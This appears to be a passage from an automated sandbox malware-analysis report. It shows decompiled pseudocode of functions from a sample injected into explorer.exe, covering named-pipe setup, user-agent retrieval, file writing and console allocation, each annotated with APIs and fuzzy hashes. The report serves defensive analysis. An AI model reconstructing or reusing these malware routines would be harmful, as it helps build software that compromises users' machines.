        • Opcode Fuzzy Hash: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
        • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E000831C2(void* __edx, void* __eflags) {
        				CHAR* _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v20;
        				signed int _t10;
        				intOrPtr _t11;
        				intOrPtr _t12;
        				void* _t16;
        				intOrPtr _t18;
        				intOrPtr _t22;
        				intOrPtr _t28;
        				void* _t38;
        				CHAR* _t40;
        
        				_t38 = __edx;
        				_t28 =  *0x9e688; // 0xb0000
        				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
        				_t40 = _t10;
        				_v8 = _t40;
        				if(_t40 != 0) {
        					_t11 = E00088604(0x80000); // executed
        					 *0x9e724 = _t11;
        					__eflags = _t11;
        					if(_t11 != 0) {
        						_t12 = E0008BD10(); // executed
        						_v16 = _t12;
        						__eflags = _t12;
        						if(_t12 != 0) {
        							_push(0xc);
        							_pop(0);
        							_v12 = 1;
        						}
        						_v20 = 0;
        						__eflags = 0;
        						asm("sbb eax, eax");
        						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
        						 *0x9e674 = _t16;
        						__eflags = _t16 - 0xffffffff;
        						if(_t16 != 0xffffffff) {
        							E0008BC7A( &_v20, _t38); // executed
        							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
        							__eflags = _t18;
        							if(_t18 != 0) {
        								goto L12;
        							}
        							_t22 =  *0x9e684; // 0x133f8f0
        							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
        							_push(0xfffffffd);
        							goto L11;
        						} else {
        							 *0x9e674 = 0;
        							_push(0xfffffffe);
        							L11:
        							_pop(0);
        							L12:
        							E0008861A( &_v8, 0xffffffff);
        							return 0;
        						}
        					}
        					_push(0xfffffff5);
        					goto L11;
        				}
        				return _t10 | 0xffffffff;
        			}

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
        • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
        • Opcode Fuzzy Hash: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
        • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00085AFF(intOrPtr __edx, void* __fp0) {
        				short _v30;
        				short _v32;
        				short _v34;
        				short _v36;
        				intOrPtr* _t22;
        				intOrPtr _t23;
        				signed int _t30;
        				intOrPtr _t38;
        				intOrPtr* _t40;
        				intOrPtr _t44;
        				intOrPtr _t45;
        				intOrPtr* _t46;
        				signed int _t47;
        				void* _t55;
        
        				_t55 = __fp0;
        				_t45 = __edx;
        				_t47 = 0;
        				_t22 = E00088604(0x14);
        				_t38 =  *0x9e688; // 0xb0000
        				_t46 = _t22;
        				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
        					_v36 =  *((intOrPtr*)(_t38 + 0x228));
        					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
        					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
        					_v30 = 0;
        					GetDriveTypeW( &_v36); // executed
        				}
        				 *_t46 = 2;
        				 *(_t46 + 4) = _t47;
        				_t23 =  *0x9e688; // 0xb0000
        				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
        				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
        				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
        				if(_t40 == 0) {
        					L9:
        					if(E00082DCB() == 0) {
        						goto L11;
        					} else {
        						_t47 = _t47 | 0xffffffff;
        					}
        				} else {
        					_t45 =  *_t40;
        					_t30 = _t47;
        					if(_t45 == 0) {
        						goto L9;
        					} else {
        						_t44 =  *((intOrPtr*)(_t40 + 4));
        						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
        							_t30 = _t30 + 1;
        							if(_t30 < _t45) {
        								continue;
        							} else {
        								goto L9;
        							}
        							goto L12;
        						}
        						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
        							L11:
        							E00084D6D(_t46, _t45, _t55);
        						} else {
        							goto L9;
        						}
        					}
        				}
        				L12:
        				E0008A39E();
        				E0008A39E();
        				return _t47;
        			}


















        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateDriveHeapType
        • String ID:
        • API String ID: 414167704-0
        • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
        • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
        • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
        • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 71%
        			E0008E450(void* __ecx, void* __edx) {
        				char _v8;
        				intOrPtr* _t5;
        				intOrPtr _t10;
        				intOrPtr* _t11;
        				void* _t12;
        
        				_push(__ecx);
        				_t5 =  *0x9e6b0; // 0x1430440
        				if( *_t5 == 0) {
        					_v8 = E000895C7(0x2a7);
        					 *0x9e788 = E000891A6(_t6, 0);
        					E000885C2( &_v8);
        					goto L4;
        				} else {
        					_v8 = 0x100;
        					_t10 = E00088604(0x101);
        					 *0x9e788 = _t10;
        					_t11 =  *0x9e6b0; // 0x1430440
        					_t12 =  *_t11(0, _t10,  &_v8); // executed
        					if(_t12 == 0) {
        						L4:
        						return 0;
        					} else {
        						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
        					}
        				}
        			}









        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Heap$AgentAllocateFreeObtainStringUser
        • String ID:
        • API String ID: 471734292-0
        • Opcode ID: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
        • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
        • Opcode Fuzzy Hash: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
        • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 88%
        			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
        				long _v8;
        				void* _v12;
        				void* _t13;
        				void* _t21;
        				void* _t23;
        				void* _t26;
        
        				_t23 = __ecx;
        				_push(__ecx);
        				_push(__ecx);
        				_t26 = 0;
        				_v12 = __ecx;
        				_t21 = __edx;
        				if(_a4 == 0) {
        					L3:
        					_t13 = 1;
        				} else {
        					while(1) {
        						_v8 = _v8 & 0x00000000;
        						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
        							break;
        						}
        						_t26 = _t26 + _v8;
        						_t23 = _v12;
        						if(_t26 < _a4) {
        							continue;
        						} else {
        							goto L3;
        						}
        						goto L4;
        					}
        					_t13 = 0;
        				}
        				L4:
        				return _t13;
        			}










        APIs
        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
        • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
        • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
        • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008A5F7(WCHAR* __ecx, long __edx) {
        				intOrPtr _t6;
        				long _t12;
        				void* _t13;
        
        				_t12 = __edx;
        				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
        				if(_t13 != 0xffffffff) {
        					if(_t12 == 4) {
        						_t6 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
        					}
        					return _t13;
        				}
        				return 0;
        			}







        APIs
        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
        • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
        • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
        • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00083017() {
        				signed int _t4;
        				intOrPtr _t8;
        				void* _t11;
        
        				_t4 =  *0x9e688; // 0xb0000
        				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
        					L3:
        					return _t4 | 0xffffffff;
        				} else {
        					_t4 = E0008BB20(_t11);
        					if(_t4 != 0) {
        						goto L3;
        					} else {
        						AllocConsole();
        						_t8 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
        						return 0;
        					}
        				}
        			}







        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocConsole
        • String ID:
        • API String ID: 4167703944-0
        • Opcode ID: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
        • Instruction ID: ec183062af37bb11ca52ab854039e277753fe4296209864586c1fc79c77fff40
        • Opcode Fuzzy Hash: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
        • Instruction Fuzzy Hash: 91E017312101059BEA10FB34CE4AAE432E0BF64B65F8601B0F254CA0A2DBB88D80CB12
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E0008A63B(WCHAR* __ecx) {
        				signed int _t5;
        
        				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
        				_t2 = _t5 + 1; // 0x1
        				asm("sbb ecx, ecx");
        				return _t5 &  ~_t2;
        			}





        APIs
        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
        • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
        • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
        • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00088604(long _a4) {
        				void* _t2;
        
        				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
        				return _t2;
        			}





        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
        • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
        • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
        • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008B269(WCHAR* __ecx) {
        
        				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
        			}




        APIs
        • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
        • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
        • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
        • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000885EF() {
        				void* _t1;
        
        				_t1 = HeapCreate(0, 0x80000, 0); // executed
        				 *0x9e768 = _t1;
        				return _t1;
        			}





        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
        • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
        • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
        • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E0008F9BF(void* __edx) {
        				char _v8;
        				char _v12;
        				char _v16;
        				char _v20;
        				char _v24;
        				intOrPtr _t26;
        				char _t27;
        				intOrPtr _t29;
        				void* _t31;
        				void* _t36;
        				char _t38;
        				intOrPtr _t39;
        				char _t42;
        				intOrPtr _t51;
        				intOrPtr _t52;
        				intOrPtr* _t63;
        				intOrPtr _t66;
        				char* _t67;
        				intOrPtr _t69;
        				char _t78;
        				void* _t81;
        				void* _t82;
        
        				_t26 =  *0x9e654; // 0x133fd20
        				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
        				_v12 = _t27;
        				if(_t27 != 0) {
        					_t63 =  *0x9e654; // 0x133fd20
        					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
        						E000886E1(_t27,  *_t63, 0x400);
        						_v8 = 0;
        						_t36 = E0008109A(_t63, 0x34a);
        						_t66 =  *0x9e688; // 0xb0000
        						_t72 =  !=  ? 0x67d : 0x615;
        						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
        						_push(0);
        						_push(_t36);
        						_t67 = "\\";
        						_v24 = _t38;
        						_push(_t67);
        						_push(_t38);
        						_t39 =  *0x9e688; // 0xb0000
        						_push(_t67);
        						_v20 = E000892E5(_t39 + 0x1020);
        						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
        						_v16 = _t42;
        						E000885D5( &_v24);
        						E000885D5( &_v20);
        						_t73 = _v16;
        						_t82 = _t81 + 0x3c;
        						_t69 = _v8;
        						if(_v16 != 0 && _t69 > 0x400) {
        							_t51 =  *0x9e654; // 0x133fd20
        							_t52 =  *((intOrPtr*)(_t51 + 4));
        							_t53 =  <  ? _t69 : _t52;
        							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
        							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
        							_t69 = _v8;
        							_t82 = _t82 + 0xc;
        						}
        						E0008861A( &_v16, _t69);
        						E0008861A( &_v20, 0xfffffffe);
        						_t27 = _v12;
        						_t81 = _t82 + 0x10;
        						_t63 =  *0x9e654; // 0x133fd20
        					}
        					_t78 = 0;
        					while(1) {
        						_t29 =  *0x9e688; // 0xb0000
        						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
        						_t81 = _t81 + 0xc;
        						if(_t31 >= 0) {
        							break;
        						}
        						Sleep(1);
        						_t78 = _t78 + 1;
        						if(_t78 < 0x2710) {
        							_t27 = _v12;
        							_t63 =  *0x9e654; // 0x133fd20
        							continue;
        						}
        						break;
        					}
        					E0008861A( &_v12, 0); // executed
        				}
        				return 0;
        			}


























        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapSleep
        • String ID:
        • API String ID: 4201116106-0
        • Opcode ID: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
        • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
        • Opcode Fuzzy Hash: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
        • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 97%
        			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
        				char _v8;
        				WCHAR* _v12;
        				signed int _v16;
        				WCHAR* _v20;
        				short _t30;
        				short _t33;
        				intOrPtr _t38;
        				intOrPtr _t43;
        				intOrPtr _t45;
        				short _t49;
        				void* _t52;
        				char _t71;
        				WCHAR* _t72;
        
        				_v16 = _v16 & 0x00000000;
        				_t71 = 0;
        				_v12 = __ecx;
        				_t49 = __edx;
        				_v8 = 0;
        				_t72 = E00088604(0x448);
        				_v20 = _t72;
        				_pop(_t52);
        				if(_t72 != 0) {
        					_t72[0x21a] = __edx;
        					_t72[0x21c] = _a8;
        					lstrcpynW(_t72, _v12, 0x200);
        					if(_t49 != 1) {
        						_t30 = E00088604(0x100000);
        						_t72[0x212] = _t30;
        						if(_t30 != 0) {
        							_t69 = _a4;
        							_t72[0x216] = 0x100000;
        							if(_a4 != 0) {
        								E000887EA(_t72, _t69);
        							}
        							L16:
        							return _t72;
        						}
        						L7:
        						if(_t71 != 0) {
        							E0008861A( &_v8, 0);
        						}
        						L9:
        						_t33 = _t72[0x218];
        						if(_t33 != 0) {
        							_t38 =  *0x9e684; // 0x133f8f0
        							 *((intOrPtr*)(_t38 + 0x30))(_t33);
        						}
        						_t73 =  &(_t72[0x212]);
        						if(_t72[0x212] != 0) {
        							E0008861A(_t73, 0);
        						}
        						E0008861A( &_v20, 0);
        						goto L1;
        					}
        					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
        					_t71 = _t43;
        					_v8 = _t71;
        					if(_t71 == 0) {
        						goto L9;
        					}
        					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
        						goto L7;
        					} else {
        						_t45 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
        						_t72[0x218] = _t72[0x218] & 0x00000000;
        						E0008861A( &_v8, 0);
        						goto L16;
        					}
        				}
        				L1:
        				return 0;
        			}

















        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcpyn
        • String ID:
        • API String ID: 680773602-0
        • Opcode ID: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
        • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
        • Opcode Fuzzy Hash: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
        • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E0008E2C6(void* __fp0, intOrPtr _a4) {
        				char _v8;
        				char _v12;
        				char _v16;
        				char _v20;
        				void* _v24;
        				void* _v28;
        				char _v32;
        				char _v544;
        				signed int _t40;
        				intOrPtr _t41;
        				intOrPtr _t48;
        				intOrPtr _t58;
        				void* _t65;
        				intOrPtr _t66;
        				void* _t70;
        				signed int _t73;
        				void* _t75;
        				void* _t77;
        
        				_t77 = __fp0;
        				_v20 = 0;
        				_v28 = 0;
        				_v24 = 0;
        				_t66 =  *0x9e6b4; // 0x133fa98, executed
        				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
        				if(_t40 == 0) {
        					_t73 = 0;
        					if(_v20 <= 0) {
        						L9:
        						_t41 =  *0x9e6b4; // 0x133fa98
        						 *((intOrPtr*)(_t41 + 0xc))(_v8);
        						return 0;
        					}
        					do {
        						_v16 = 0;
        						_v12 = 0;
        						_t48 =  *0x9e68c; // 0x133fab8
        						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
        						_t70 = E00088604(_v16 + 1);
        						if(_t70 != 0) {
        							_v12 = 0x200;
        							_push( &_v32);
        							_push( &_v12);
        							_push( &_v544);
        							_push( &_v16);
        							_push(_t70);
        							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
        							_t58 =  *0x9e68c; // 0x133fab8
        							_push(0);
        							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
        								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
        								_t75 = _t75 + 0xc;
        								Sleep(0xa);
        							}
        						}
        						_t73 = _t73 + 1;
        					} while (_t73 < _v20);
        					goto L9;
        				}
        				return _t40 | 0xffffffff;
        			}






















        APIs
        • Sleep.KERNELBASE(0000000A), ref: 0008E394
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
        • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
        • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
        • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
        				intOrPtr _v8;
        				signed int _v16;
        				char _v20;
        				void* _t24;
        				char _t25;
        				signed int _t30;
        				intOrPtr* _t45;
        				signed int _t46;
        				void* _t47;
        				void* _t54;
        
        				_t54 = __fp0;
        				_t45 = __edx;
        				_t46 = 0;
        				_t30 = __ecx;
        				if( *__edx > 0) {
        					do {
        						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
        						if(_t24 == 0) {
        							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
        							_v8 = _t25;
        							if(_t25 != 0) {
        								L6:
        								_v16 = _v16 & 0x00000000;
        								_v20 = _t25;
        								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
        								_t47 = _t47 + 0xc;
        							} else {
        								if(GetLastError() != 0xd) {
        									_t25 = _v8;
        									goto L6;
        								} else {
        									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
        								}
        							}
        						}
        						_t46 = _t46 + 1;
        					} while (_t46 <  *_t45);
        				}
        				return 0;
        			}

        APIs
          • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
        • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ErrorLast
        • String ID:
        • API String ID: 1452528299-0
        • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
        • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
        • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
        • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00085D7D(void* __eflags) {
        				char _v44;
        				intOrPtr _t7;
        				intOrPtr _t10;
        				void* _t11;
        				WCHAR* _t12;
        				WCHAR* _t13;
        				WCHAR* _t14;
        				intOrPtr _t15;
        				intOrPtr _t19;
        				intOrPtr _t22;
        				void* _t27;
        				WCHAR* _t28;
        
        				_t7 =  *0x9e688; // 0xb0000
        				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
        				_t10 =  *0x9e684; // 0x133f8f0
        				_t28 = 2;
        				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
        				if(_t11 == 0) {
        					_t22 =  *0x9e688; // 0xb0000
